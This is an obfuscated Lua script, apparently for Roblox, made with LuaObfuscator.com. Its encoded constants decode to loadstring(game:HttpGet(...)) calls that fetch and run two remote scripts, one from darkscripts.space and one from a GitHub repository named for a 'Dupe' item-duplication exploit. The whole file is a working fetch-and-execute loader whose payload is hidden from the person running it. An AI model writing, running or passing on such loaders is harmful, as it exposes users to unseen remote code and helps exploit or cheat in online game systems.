--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v111=v5(v87,v19);v19=nil;return v111;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-(1 -0)) -(v32-(1638 -(1523 + 114)))) + (2 -1))) ;return v88-(v88%(1 + 0)) ;else local v89=619 -(124 + 431 + 64) ;local v90;while true do if (v89==(931 -(857 + (1031 -(892 + 65))))) then v90=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v90 + v90))>=v90) and (118 -((75 -43) + 85))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;return (v36 * (469 -213)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + (277 -164))) ;return (v40 * 16777216) + (v39 * 65536) + (v38 * (188 + 68)) + v37 ;end local function v24() local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(11 -8)) then if (v46==(0 + 0)) then if (v45==(952 -(802 + 150))) then return v47 * (438 -(145 + (1149 -856))) ;else local v121=0 -0 ;while true do if (v121==(1486 -(998 + (2401 -(1789 + 124))))) then v46=1 -0 ;v44=0 + 0 ;break;end end end elseif (v46==(3044 -(915 + 82))) then return ((v45==(0 -0)) and (v47 * ((1139 -(116 + (1788 -(745 + 21))))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(601 + 422) ) * (v44 + (v45/((2 -(0 + 0))^(184 -132)))) ;end if (v41==(1187 -(1069 + 118))) then v42=v23();v43=v23();v41=2 -1 ;end if (v41==(4 -2)) then v46=v20(v43,(16 + 29) -24 ,6 + 25 );v47=((v20(v43,(1067 -(87 + 968)) + 20 )==(886 -((1148 -887) + 624))) and  -(1 -0)) or (1 + 0) ;v41=794 -(368 + 423) ;end if (v41==(3 -2)) then v44=19 -(10 + 8) ;v45=(v20(v43,1,(86 + 8) -74 ) * (((2 -1) + 1)^(109 -77))) + v42 ;v41=7 -5 ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(1413 -(447 + 966))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;local v50={};for v66=1818 -(1703 + 114) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91~=0) then else local v116=(function() return 1409 -(450 + 959) ;end)();while true do if (v116==(1990 -(582 + 1408))) then v92=(function() return v93();end)();v94=(function() return nil;end)();v116=(function() return 3 -2 ;end)();end if (1==v116) then v91=(function() return  #":";end)();break;end end end if (v91== #" ") then if (v92== #">") then v94=(function() return v93()~=(0 -0) ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92~= #"91(") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();while true do if (v102==(1824 -(1195 + 629))) then local v118=(function() return 0;end)();local v119=(function() return;end)();while true do if ((0 -0)~=v118) then else v119=(function() return 0;end)();while true do if (v119==0) then v99[v100-#"[" ]=(function() return v101();end)();return v99,v100,v101;end end break;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #">",v57 do FlatIdent_25011,Type,v21,Cons,v24,v25,v58,v68=(function() return v51(FlatIdent_25011,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"91("]=(function() return v21();end)();for v69= #"\\",v23() do local v70=(function() return v21();end)();if (v20(v70, #" ", #"[")==(241 -(187 + 54))) then local v106=(function() return 780 -(162 + 618) ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if ((1 + 0)~=v106) then else local v120=(function() return 0 + 0 ;end)();while true do if (v120==1) then v106=(function() return 3 -1 ;end)();break;end if (v120==(0 -0)) then v109=(function() return nil;end)();v110=(function() return nil;end)();v120=(function() return 1 + 0 ;end)();end end end if (v106~=(1638 -(1373 + 263))) then else while true do if (v107== #"-19") then if (v20(v109, #"gha", #"xxx")== #"<") then v110[ #".com"]=(function() return v58[v110[ #"http"]];end)();end v53[v69]=(function() return v110;end)();break;end if ( #">"~=v107) then else local v123=(function() return 1000 -(451 + 549) ;end)();local v124=(function() return;end)();while true do if (v123~=0) then else v124=(function() return 0 + 0 ;end)();while true do if (v124==0) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v181=(function() return 0 -0 ;end)();local v182=(function() return;end)();while true do if (0~=v181) then else v182=(function() return 1384 -(746 + 638) ;end)();while true do if (0==v182) then v110[ #"nil"]=(function() return v22();end)();v110[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v108== #".") then v110[ #"91("]=(function() return v23();end)();elseif (v108==2) then v110[ #"-19"]=(function() return v23() -((1 + 1)^(23 -7)) ;end)();elseif (v108== #"gha") then local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if (v189~=(341 -(218 + 123))) then else v190=(function() return 0;end)();while true do if ((1581 -(1535 + 46))==v190) then v110[ #"91("]=(function() return v23() -((2 + 0)^16) ;end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v124=(function() return 1;end)();end if (1==v124) then v107=(function() return 1 + 1 ;end)();break;end end break;end end end if (v107==0) then local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if (v125~=(560 -(306 + 254))) then else v126=(function() return 0 + 0 ;end)();while true do if (v126==(0 -0)) then v108=(function() return v20(v70,2, #"gha");end)();v109=(function() return v20(v70, #".com",6);end)();v126=(function() return 1468 -(899 + 568) ;end)();end if (v126==1) then v107=(function() return  #">";end)();break;end end break;end end end if (v107==2) then local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if (v127~=(0 + 0)) then else v128=(function() return 0;end)();while true do if (v128==0) then if (v20(v109, #"|", #",")~= #".") then else v110[2]=(function() return v58[v110[2]];end)();end if (v20(v109,4 -2 ,2)~= #".") then else v110[ #"nil"]=(function() return v58[v110[ #"91("]];end)();end v128=(function() return 1;end)();end if (v128~=(604 -(268 + 335))) then else v107=(function() return  #"nil";end)();break;end end break;end end end end break;end if (v106==(290 -(60 + 230))) then v107=(function() return 572 -(426 + 146) ;end)();v108=(function() return nil;end)();v106=(function() return 1;end)();end end end end for v71= #"|",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[(2 -1) + 0 ];local v64=v60[1458 -((722 -440) + (2725 -(1126 + 425))) ];local v65=v60[814 -((974 -(118 + 287)) + 242) ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=2 -1 ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v103=1251 -(721 + (1651 -(118 + 1003))) ,v80 do if (v103>=v74) then v78[v103-v74 ]=v79[v103 + (1272 -(945 + 326)) ];else v82[v103]=v79[v103 + (2 -1) ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do v84=v72[v76];v85=v84[701 -(271 + 429) ];if ((1284<3151) and (v85<=(10 + (0 -0)))) then if (v85<=((1881 -(142 + 235)) -((6387 -4979) + 21 + 71))) then if (v85<=(1087 -(461 + 625))) then if (v85>(1288 -(993 + (1272 -(553 + 424))))) then local v129=v84[1 + (1 -0) ];local v130,v131=v75(v82[v129](v13(v82,v129 + (1172 -(418 + 753)) ,v84[2 + 1 ])));v77=(v131 + v129) -(1 + 0) ;local v132=0;for v149=v129,v77 do local v150=0 + 0 + 0 ;while true do if (v150==0) then v132=v132 + 1 + 0 ;v82[v149]=v130[v132];break;end end end else local v133=v84[(527 + 4) -(406 + 72 + 51) ];local v134=v82[v84[1772 -(1749 + 20) ]];v82[v133 + 1 + 0 ]=v134;v82[v133]=v134[v84[1326 -(1249 + 73) ]];end elseif (v85<=2) then for v151=v84[2],v84[2 + 1 ] do v82[v151]=nil;end elseif ((v85>(1148 -(466 + 289 + 390))) or (1850==1529)) then if (v82[v84[2]]==v84[3 + 1 ]) then v76=v76 + 1 ;else v76=v84[6 -3 ];end else v76=v84[8 -5 ];end elseif (v85<=(1907 -(106 + 1794))) then if (v85<=(2 + 3)) then local v138=v84[1 + (2 -1) ];local v139,v140=v75(v82[v138](v13(v82,v138 + 1 ,v84[8 -5 ])));v77=(v140 + v138) -(2 -(2 -1)) ;local v141=114 -(4 + 110) ;for v153=v138,v77 do v141=v141 + (2 -1) ;v82[v153]=v139[v141];end elseif (v85>(590 -(17 + 40 + 527))) then v82[v84[(6905 -5476) -(41 + 1386) ]]=v62[v84[3]];else local v159=(856 -(239 + 514)) -(17 + 31 + 55) ;local v160;local v161;while true do if (v159==0) then v160=v84[2 + 0 ];v161=v82[v84[6 -3 ]];v159=2 -1 ;end if ((821<2123) and (v159==(167 -((1451 -(797 + 532)) + 44)))) then v82[v160 + 1 ]=v161;v82[v160]=v161[v84[6 -2 ]];break;end end end elseif (v85<=(26 -18)) then v82[v84[2 + 0 ]]=v62[v84[1 + 0 + 1 + 1 ]];elseif (v85>9) then if ((902<2325) and (v82[v84[(6 -3) -1 ]]==v84[69 -(30 + (1237 -(373 + 829))) ])) then v76=v76 + 1 + 0 ;else v76=v84[3];end else v82[v84[2]]=v84[1260 -(1043 + 214) ]~=((731 -(476 + 255)) -0) ;end elseif (v85<=15) then if ((858<=2962) and (v85<=(1224 -(323 + 889)))) then if (v85==11) then v82[v84[5 -3 ]]();else v76=v84[3];end elseif ((v85<=(593 -(361 + 219))) or (3946<1288)) then v82[v84[2]]=v84[3];elseif (v85==(334 -(53 + 267))) then v82[v84[1132 -(369 + 761) ]]=v84[1 + 2 ];else do return;end end elseif (v85<=18) then if (v85<=(429 -(9 + 6 + 398))) then do return;end elseif ((v85>(999 -(18 + 964))) or (3242==567)) then local v165=v84[(12 -5) -5 ];v82[v165]=v82[v165](v13(v82,v165 + 1 + 0 ,v77));else v82[v84[2]]=v84[2 + 1 ]~=(850 -(20 + 830)) ;end elseif ((v85<=(15 + 4)) or (847>=1263)) then v82[v84[128 -(116 + 10) ]]();elseif (v85==(2 + 18)) then local v168=v84[740 -(542 + (370 -174)) ];v82[v168]=v82[v168](v13(v82,v168 + (1 -0) ,v77));else for v170=v84[1 + 1 ],v84[2 + 1 ] do v82[v170]=nil;end end v76=v76 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F3533633233322Q612D623164362D34302Q312D613230362D3363372Q38356234326462635F39332Q3633303134393735383231343239362E6C756103473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53702Q6564584875622F447570652F726566732F68656164732F6D61696E2F447570654F50001B3Q00120D3Q00014Q0015000100013Q0026043Q00020001000100040C3Q0002000100120D000100013Q002604000100050001000100040C3Q00050001001207000200023Q001207000300033Q00200600030003000400120D000500054Q0009000600014Q0005000300064Q001400023Q00022Q0013000200010001001207000200023Q001207000300033Q00200600030003000400120D000500064Q0005000300054Q001400023Q00022Q001300020001000100040C3Q001A000100040C3Q0005000100040C3Q001A000100040C3Q000200012Q00103Q00017Q00",v9(),...);
